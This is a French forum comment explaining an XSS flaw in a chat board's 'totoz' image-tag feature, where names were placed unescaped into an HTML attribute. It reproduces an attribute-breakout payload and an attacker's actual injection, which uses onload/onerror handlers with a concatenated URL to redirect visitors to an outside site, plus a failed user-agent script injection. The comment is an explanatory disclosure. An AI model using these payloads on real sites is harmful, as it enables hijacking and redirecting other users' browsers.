• # Totoz

    Posté par . En réponse à l’entrée du suivi faille xss et un gosse qui joue avec. Évalué à 2 (+0/-0).

    Voici une tentative d'explication :
    Lorsque que l'on insert un totoz, par exemple onoz, voici ce que l'on obtient :

    <span data-totoz-name="onoz" class="totoz">[:onoz]</span>
    
    

    Vous l'aurez vite compris, la faille provient du fait que le nom du totoz est inséré dans l'attribut data-totoz-name. Du coup avec un totoz un peu plus élaboré comme " onload="alert('owned')" title=" on obtient le code suivant :

    <span data-totoz-name="" onload="alert('owned')" title="" class="totoz">[:" onload="alert('owned')" title="]</span>
    
    

    Pour les curieux, voici le code source de son commentaire :

    <p id="board-823943" class="chat">
    <span title="Mozilla/5.0 (X11; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 &amp;#x27;&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(&amp;#x27;test&amp;#x27;)&amp;lt;/script&amp;gt;" class="board-left">
    <time datetime="2012-08-21T19:12:56+02:00" class="norloge">19:12:56</time>
    <b><a href="/users/superxss">superxss</a></b>
    </span>
    <span class="board-right"><span title="" onload="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" data-totoz-name="" class="totoz">[:" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" onload="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" title="]</span></span>
    </p>
    
    

    On peut remarquer qu'il a tenté avec le user-agent, mais que manifestement, sa n'a pas marché. Du coup il c'est rabattu sur les totoz.